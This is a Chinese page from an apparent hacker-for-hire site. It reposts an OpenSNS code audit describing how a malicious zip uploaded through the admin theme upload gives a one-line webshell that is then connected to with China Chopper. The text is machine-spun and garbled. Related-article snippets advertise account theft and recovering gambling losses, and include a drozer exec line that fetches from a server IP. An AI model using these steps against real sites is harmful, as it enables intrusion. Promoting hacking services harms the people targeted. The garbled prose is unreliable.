记对OpenSNS的一次代码审计-黑客接单平台

访客5年前黑客资讯911
概述 OpenSNS是想天科技开发的一款综合 *** 际软件。您能够运用OpenSNS快速建立一个类似于新浪微博相同的功用强大的交际网站。您的交际网站也能够在微信中被拜访,还支撑苹果和安卓手机经过APP的方式运用。除此之外,OpenSNS还供给云商场进行功用扩展,许多的扩展让你的网站如虎添翼。官网:http://www.opensns.cn/ 相关环境 源码信息:OpenSNS开源版 缝隙类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 缝隙文件:./Application/Admin/Controller/ThemeController.class.php 第170行 缝隙原理 程序在上传zip文件时,主动对zip文件进行解压没有对解压出文件的内容进行过滤就直接写入硬盘。 缝隙剖析 代码中对上传文件进行了后缀名过滤,对不合法尾缀名文件进行了过滤,过两次成功后进行了解压,可是并没有对解压后的文件内容进行过滤直接写入了硬盘导致了缝隙的存在 缝隙复现 1. 翻开网站后台找到模板上传方位 2. 装备一个压缩包,压缩包里是一句话木马 3. 挑选上传 4.上传成功承认复现 5. 上菜刀连一下 解决方案 对上传模板文件进行约束或制止前台拜访该目录。 结语 许多刚刚入坑的萌新们以为代码审计好像很难,想挖到缝隙好像只要大佬们才干完成,可是其实我想说挖到归于自己的缝隙其实并不难,需求的是你能够平静下急于求成的心,耐得住缝隙发掘中的庸俗,不断去锻炼自己的毅力,增加自己的经历,信任自己,你是醉棒的,你也能够成为他人眼中的大佬!

相关文章

qq空间问题,找黑客盗导,找黑客弄回网赌输的钱是真的吗

runtime.exec(['/system/bin/sh','-c',weaselPath+''+serverip+'80getdrozer.config']).waitFor();在Post da...

学信,怎样联系黑客攻击别人的电脑,找黑客破解个软件多少钱

2)OK,去找上传点Substring right:标题需求难度适中。 假如太刁钻,简略让人抛弃,并发生报复心思,抛弃往后余下的时刻便是给你捣蛋的时刻。 也不能太痴人,太痴人的标题被人分分钟秒了,余下...

便宜黑客接单平台_找黑客查别人微信

6、不卫生的卫生用品12、admin (↓ 1)Powershell Empire和PSAttack都是不依赖于powershell.exe的PowerShell运用结构。 它们别离运用python和...

被我伤透心的女朋友已经分手了,还有挽回的余地吗

Windows 操作系统就算不开启ssl模块,你自己修改apache配置,能开启其他端口,也是能利用的就像这样被我伤透心的女朋友已经分手了,还有挽回的余地吗, 图1 MailEnable全球范围内情况...

借不了赌怎么办、总输钱、然后还幻想能赢回来

关于成功率的说法通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。 Windows XP 专业 x64 版 SP2借不了赌怎么办、总输钱...

SMTP用户枚举原理简介及相关东西

SMTP是安全测验中比较常见的服务类型,其不安全的装备(未禁用某些指令)会导致用户枚举的问题,这主要是经过SMTP指令进行的。本文将介绍SMTP用户枚举原理以及相关东西。 SMTP SMTP指令 若服...